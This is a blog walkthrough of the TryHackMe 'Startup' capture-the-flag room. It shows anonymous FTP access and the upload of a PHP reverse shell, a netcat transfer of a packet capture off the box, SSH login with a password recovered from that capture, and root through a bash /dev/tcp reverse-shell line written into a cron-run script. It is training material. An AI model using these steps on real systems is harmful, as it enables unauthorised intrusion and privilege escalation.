20 November 2020 / TRYHACKME, CTF, EASY Startup Write Up Overview Startup is an fun easy room from TryHackMe. Credit to r1gormort1s for a great room. We have three tasks to complete, finding both the user and root flag and the secret ingredient in the spicy soup recipe. The description of the room is: We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (incase you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you preform a thorough penetration test and try to own root. Good luck! Nmap TryHackMe will assign a dynamic IP as part of the deployment, I’ve edited my /etc/hosts file with the name of the box and the assigned IP. I started by doing an nmap scan to check what ports are open. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $sudo nmap -sC -sV -oN nmap/initial startup [sudo] password for daz: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-21 11:01 GMT Nmap scan report for startup (10.10.27.29) Host is up (0.026s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt | ftp-syst: | STAT: | FTP server status: | Connected to (VPN IP) | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) | 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) |_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Maintenance Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds 3 Ports open: 21 - FTP - Anonymous login allowed which is interesting will need to check what files and access is available 22 - SSH - Banner is showing its an Ubuntu machine 80 - HTTP - Apache web server Enumeration Starting with FTP (port 21) I logged in using anonymous as the username and password. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $ftp startup Connected to startup. 220 (vsFTPd 3.0.3) Name (startup:daz): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt 226 Directory send OK. ftp> cd ftp 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ls -lah 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 . drwxr-xr-x 3 65534 65534 4096 Nov 12 04:53 .. 226 Directory send OK. ftp> get important.jpg local: important.jpg remote: important.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for important.jpg (251631 bytes) 226 Transfer complete. 251631 bytes received in 0.10 secs (2.3400 MB/s) ftp> get notice.txt local: notice.txt remote: notice.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for notice.txt (208 bytes). 226 Transfer complete. 208 bytes received in 0.00 secs (4.1326 MB/s) ftp> A few files are available including a txt file stating someone is uploading Among Us memes. (I know nothing about Among Us but my kids say its good….. I prefer Assassins Creed!). We do have a possible username of Maya. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $cat notice.txt Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is , but Maya is looking pretty sus. But nothing else out of interest. So I turned my attention to HTTP (port 80). A very simple webpage and nothing really to note in the source. So I ran a gobuster to check for other directories. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $gobuster dir -u http://startup -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x txt,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://startup [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,html [+] Timeout: 10s =============================================================== 2020/11/21 11:12:05 Starting gobuster =============================================================== /files (Status: 301) /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2020/11/21 11:22:32 Finished =============================================================== ‘/files’ looks interesting. This mirrors the files seen on the FTP service, so my first thought is to see if we can upload a reverse shell script via ftp and execute via the web. Initial Access The first step is to copy a web shell script in to our working directory. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $cp /usr/share/webshells/php/php-reverse-shell.php ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $mv php-reverse-shell.php shell.php ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $ I edited the script with my vpn IP and changed the port to 4444. set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; Next I uploaded the script via ftp. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $ftp startup Connected to startup. 220 (vsFTPd 3.0.3) Name (startup:daz): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> put shell.php local: shell.php remote: shell.php 200 PORT command successful. Consider using PASV. 553 Could not create file. ftp> cd ftp 250 Directory successfully changed. ftp> put shell.php local: shell.php remote: shell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5493 bytes sent in 0.00 secs (168.9849 MB/s) ftp> exit 221 Goodbye. I was unable to add to the initial directory however once I changed to the ‘ftp’ directory I was able to successfully upload the web shell script. Now I just need to navigate to the file in my browser. We have a shell! ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $nc -nvlp 4444 listening on [any] 4444 ... connect to [(VPN IP)] from (UNKNOWN) [10.10.27.29] 48764 Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 11:29:08 up 31 min, 0 users, load average: 0.00, 1.01, 1.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ We only have a limited shell as www-data so the next step is to enumerate the system to escalate privileges. $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ ls -lah total 100K drwxr-xr-x 25 root root 4.0K Nov 21 10:58 . drwxr-xr-x 25 root root 4.0K Nov 21 10:58 .. drwxr-xr-x 2 root root 4.0K Sep 25 08:12 bin drwxr-xr-x 3 root root 4.0K Sep 25 08:12 boot drwxr-xr-x 16 root root 3.5K Nov 21 10:58 dev drwxr-xr-x 96 root root 4.0K Nov 12 05:08 etc drwxr-xr-x 3 root root 4.0K Nov 12 04:53 home drwxr-xr-x 2 www-data www-data 4.0K Nov 12 04:53 incidents lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic drwxr-xr-x 22 root root 4.0K Sep 25 08:22 lib drwxr-xr-x 2 root root 4.0K Sep 25 08:10 lib64 drwx------ 2 root root 16K Sep 25 08:12 lost+found drwxr-xr-x 2 root root 4.0K Sep 25 08:09 media drwxr-xr-x 2 root root 4.0K Sep 25 08:09 mnt drwxr-xr-x 2 root root 4.0K Sep 25 08:09 opt dr-xr-xr-x 127 root root 0 Nov 21 10:57 proc -rw-r--r-- 1 www-data www-data 136 Nov 12 04:53 recipe.txt drwx------ 4 root root 4.0K Nov 12 04:54 root drwxr-xr-x 25 root root 920 Nov 21 11:20 run drwxr-xr-x 2 root root 4.0K Sep 25 08:22 sbin drwxr-xr-x 2 root root 4.0K Nov 12 04:50 snap drwxr-xr-x 3 root root 4.0K Nov 12 04:52 srv dr-xr-xr-x 13 root root 0 Nov 21 11:31 sys drwxrwxrwt 7 root root 4.0K Nov 21 11:31 tmp drwxr-xr-x 10 root root 4.0K Sep 25 08:09 usr drwxr-xr-x 2 root root 4.0K Nov 12 04:50 vagrant drwxr-xr-x 14 root root 4.0K Nov 12 04:52 var lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic $ As www-data we own a folder and a txt file. I checked the incidents folder and found a pcapng file, I used netcat to transfer the file to my machine so I could review in Wireshark. On my machine: ┌──[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $nc -nvlp 8080 > catch.pcapng listening on [any] 8080 ... Back on Startup: $ cd incidents $ ls suspicious.pcapng $ nc [VPN IP] 8080 < suspicious.pcapng Opening the file in Wireshark allows us to review the packet capture and review the captured incident. Scanning through it appears someone has completed the same steps I have by uploading a web shell and navigating to the directory via port 80 and executed the reverse shell. After the GET request I can see TCP packets on port 4444. Right click on one of the packets and select Follow > TCP Stream. This will show the entire TCP stream and all the commands and responses between the attacker and the server. Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 17:40:21 up 20 min, 1 user, load average: 0.00, 0.03, 0.12 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT vagrant pts/0 10.0.2.2 17:21 1:09 0.54s 0.54s -bash uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ ls bin boot data dev etc home incidents initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc recipe.txt root run sbin snap srv sys tmp usr vagrant var vmlinuz vmlinuz.old $ ls -la total 96 drwxr-xr-x 26 root root 4096 Oct 2 17:24 . drwxr-xr-x 26 root root 4096 Oct 2 17:24 .. drwxr-xr-x 2 root root 4096 Sep 25 08:12 bin drwxr-xr-x 3 root root 4096 Sep 25 08:12 boot drwxr-xr-x 1 vagrant vagrant 140 Oct 2 17:24 data drwxr-xr-x 16 root root 3620 Oct 2 17:20 dev drwxr-xr-x 95 root root 4096 Oct 2 17:24 etc drwxr-xr-x 4 root root 4096 Oct 2 17:26 home drwxr-xr-x 2 www-data www-data 4096 Oct 2 17:24 incidents lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic drwxr-xr-x 22 root root 4096 Sep 25 08:22 lib drwxr-xr-x 2 root root 4096 Sep 25 08:10 lib64 drwx------ 2 root root 16384 Sep 25 08:12 lost+found drwxr-xr-x 2 root root 4096 Sep 25 08:09 media drwxr-xr-x 2 root root 4096 Sep 25 08:09 mnt drwxr-xr-x 2 root root 4096 Sep 25 08:09 opt dr-xr-xr-x 125 root root 0 Oct 2 17:19 proc -rw-r--r-- 1 www-data www-data 136 Oct 2 17:24 recipe.txt drwx------ 3 root root 4096 Oct 2 17:24 root drwxr-xr-x 25 root root 960 Oct 2 17:23 run drwxr-xr-x 2 root root 4096 Sep 25 08:22 sbin drwxr-xr-x 2 root root 4096 Oct 2 17:20 snap drwxr-xr-x 3 root root 4096 Oct 2 17:23 srv dr-xr-xr-x 13 root root 0 Oct 2 17:19 sys drwxrwxrwt 7 root root 4096 Oct 2 17:40 tmp drwxr-xr-x 10 root root 4096 Sep 25 08:09 usr drwxr-xr-x 1 vagrant vagrant 118 Oct 1 19:49 vagrant drwxr-xr-x 14 root root 4096 Oct 2 17:23 var lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic $ whoami www-data $ python -c "import pty;pty.spawn('/bin/bash')" www-data@startup:/$ cd cd bash: cd: HOME not set www-data@startup:/$ ls ls bin etc initrd.img.old media recipe.txt snap usr vmlinuz.old boot home lib mnt root srv vagrant data incidents lib64 opt run sys var dev initrd.img lost+found proc sbin tmp vmlinuz www-data@startup:/$ cd home cd home www-data@startup:/home$ cd lennie cd lennie bash: cd: lennie: Permission denied www-data@startup:/home$ ls ls lennie www-data@startup:/home$ cd lennie cd lennie bash: cd: lennie: Permission denied www-data@startup:/home$ sudo -l sudo -l [sudo] password for www-data: [redacted]] Sorry, try again. [sudo] password for www-data: Sorry, try again. [sudo] password for www-data: [redacted]] sudo: 3 incorrect password attempts www-data@startup:/home$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false lennie:x:1002:1002::/home/lennie: ftpsecure:x:1003:1003::/home/ftpsecure: www-data@startup:/home$ exit exit exit $ exit I have redacted the output to hide the password however its clearly visible in the output in the Wireshark capture. Im going to assume the user has not changed their password and try to login in using SSH with the capture credentials. Priv Esc SSH works as expected as the user ‘lennie’. Logging in I can now grab the first flag user.txt. To complete this room we need to escalate our privileges to root to grab the final flag. In the users home directly are two folders ‘Documents’ and ‘scripts’. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $ssh lennie@startup lennie@startup's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 44 packages can be updated. 30 updates are security updates. Last login: Sat Nov 21 12:01:37 2020 from (VPN IP) $ bash lennie@startup:~$ ls -alh total 24K drwx------ 5 lennie lennie 4.0K Nov 21 12:01 . drwxr-xr-x 3 root root 4.0K Nov 12 04:53 .. drwx------ 2 lennie lennie 4.0K Nov 21 12:01 .cache drwxr-xr-x 2 lennie lennie 4.0K Nov 12 04:53 Documents drwxr-xr-x 2 root root 4.0K Nov 12 04:54 scripts -rw-r--r-- 1 lennie lennie 38 Nov 12 04:53 user.txt lennie@startup:~$ cd Documents/ lennie@startup:~/Documents$ ls -lah total 20K drwxr-xr-x 2 lennie lennie 4.0K Nov 12 04:53 . drwx------ 5 lennie lennie 4.0K Nov 21 12:01 .. -rw-r--r-- 1 root root 139 Nov 12 04:53 concern.txt -rw-r--r-- 1 root root 47 Nov 12 04:53 list.txt -rw-r--r-- 1 root root 101 Nov 12 04:53 note.txt lennie@startup:~/Documents$ cat concern.txt I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie lennie@startup:~/Documents$ cat list.txt Shoppinglist: Cyberpunk 2077 | Milk | Dog food lennie@startup:~/Documents$ cat note.txt Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs. lennie@startup:~/Documents$ Nothing to important and this stage so I looked at scripts. lennie@startup:~/Documents$ cd .. lennie@startup:~$ cd scripts/ lennie@startup:~/scripts$ ls -lag total 16 drwxr-xr-x 2 root 4096 Nov 12 04:54 . drwx------ 5 lennie 4096 Nov 21 12:01 .. -rwxr-xr-x 1 root 77 Nov 12 04:53 planner.sh -rw-r--r-- 1 root 1 Nov 21 12:07 startup_list.txt lennie@startup:~/scripts$ ls -lah total 16K drwxr-xr-x 2 root root 4.0K Nov 12 04:54 . drwx------ 5 lennie lennie 4.0K Nov 21 12:01 .. -rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh -rw-r--r-- 1 root root 1 Nov 21 12:07 startup_list.txt lennie@startup:~/scripts$ Two files both owned by root. lennie@startup:~/scripts$ cat startup_list.txt lennie@startup:~/scripts$ cat planner.sh #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.sh lennie@startup:~/scripts$ It appears the planner.sh bash script echos the LIST variable to the startup_list.txt file, however the file is currently blank. Then it runs the script found at /etc/print.sh lennie@startup:~/scripts$ cat /etc/print.sh #!/bin/bash echo "Done!" lennie@startup:~/scripts$ ls -lah /etc/print.sh -rwx------ 1 lennie lennie 25 Nov 12 04:53 /etc/print.sh lennie@startup:~/scripts$ /etc/print.sh simply echos “Done!” however the user Lennie owns this file so we can edit the script and make it do what we want. Before I do that though I need to be sure that root will run the script regularly. To do that I use a tool called pspy. I use python3 to start a quick http server: sudo python3 -m http.server 80. On the Startup machine I download pspy and execute. lennie@startup:~/scripts$ cd /dev/shm lennie@startup:/dev/shm$ wget http://(VPN IP)/pspy64 --2020-11-21 12:13:38-- http://(VPN IP)/pspy64 Connecting to (VPN IP):80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: ‘pspy64’ pspy64 100%[=========================================================================================>] 2.94M 1.60MB/s in 1.8s 2020-11-21 12:13:40 (1.60 MB/s) - ‘pspy64’ saved [3078592/3078592] lennie@startup:/dev/shm$ chmod +x pspy64 lennie@startup:/dev/shm$ pspy will now show all the processes running and the users associated. root is running the script regularly, I can determine its root as the UID is 0. lennie@startup:~/scripts$ cat /etc/print.sh #!/bin/bash echo "Done!" bash -i >& /dev/tcp/(VPN IP)/8888 0>&1 lennie@startup:~/scripts$ I edit the print.sh script with a bash reverse shell one liner and wait for the script to execute. ┌─[daz@parrot]─[~/Documents/TryHackMe/Startup] └──╼ $nc -nvlp 8888 listening on [any] 8888 ... connect to [(VPN IP)] from (UNKNOWN) [10.10.27.29] 34830 bash: cannot set terminal process group (2212): Inappropriate ioctl for device bash: no job control in this shell root@startup:~# cd /root cd /root root@startup:~# ls -lah ls -lah total 28K drwx------ 4 root root 4.0K Nov 12 04:54 . drwxr-xr-x 25 root root 4.0K Nov 21 10:58 .. -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc drwxr-xr-x 2 root root 4.0K Nov 12 04:54 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 38 Nov 12 04:53 root.txt drwx------ 2 root root 4.0K Nov 12 04:50 .ssh root@startup:~# Wait a few seconds and root shell! I really enjoyed this room, particularly the Wireshark element reviewing the capture to locate credentials. Secret ingredient I still need to find the secret ingredient from the recipe! This can be found at /recipe.txt $ cat recipe.txt Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was [redacted]. Thanks for reading! ============================================================ Any comments or feedback welcome! You can find me on twitter.